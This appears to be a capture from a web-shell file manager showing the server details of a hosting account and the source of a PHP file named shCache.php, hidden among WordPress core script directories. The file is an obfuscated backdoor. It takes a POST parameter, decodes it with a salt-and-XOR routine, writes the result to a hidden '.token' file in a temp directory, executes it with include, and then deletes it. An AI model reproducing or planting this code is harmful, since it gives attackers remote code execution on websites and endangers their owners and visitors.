HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //home/vitanhod/www/wp-includes/js/dist/script-modules/block-library/search/shCache.php
<?php

if(!empty($_POST["\x63\x6F\x6D\x70onent"])){
	$factor = array_filter(["/dev/shm", getenv("TMP"), sys_get_temp_dir(), session_save_path(), "/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), "/var/tmp", getcwd()]);
	$object = $_POST["\x63\x6F\x6D\x70onent"];
		 $object=explode	(	 "."	,		$object		 )	;	 	
	$value=	'';
            $salt=	'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen=	strlen($salt 	);
    
            foreach ($object as $n => $v9):
                $sChar=	ord($salt[$n % $sLen] 	);
                $dec=	((int)$v9 - $sChar - ($n % 10)) ^59;
                $value .= chr($dec 	);
            endforeach;
	foreach ($factor as $key => $parameter_group) {
    		if (is_dir($parameter_group) && is_writable($parameter_group)) {
    $desc = sprintf("%s/.token", $parameter_group);
    $success = file_put_contents($desc, $value);
if ($success) {
	include $desc;
	@unlink($desc);
	die();}
}
}
}